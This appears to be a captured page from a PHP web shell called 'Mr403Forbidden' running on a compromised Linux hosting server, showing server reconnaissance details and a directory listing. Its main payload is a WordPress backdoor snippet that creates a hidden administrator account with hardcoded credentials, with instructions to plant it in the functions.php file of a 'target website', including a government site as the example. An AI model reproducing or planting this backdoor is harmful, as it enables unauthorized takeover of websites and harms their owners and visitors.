./Mr403Forbidden

:/etc/clamd.d/ [ drwxr-xr-x ]

System: Linux ngx341.inmotionhosting.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
Software: Apache
PHP Version: 8.3.19 PHP Os: Linux
Server IP: 192.145.239.41
Your IP: 18.118.171.161
User: babara5 (3680) | Group: babara5 (3683)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
opcache_get_status

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
scan.conf file 2025-01-26 21:19 26.88 KB root/root -rw-r--r--

© ./Mr403Forbidden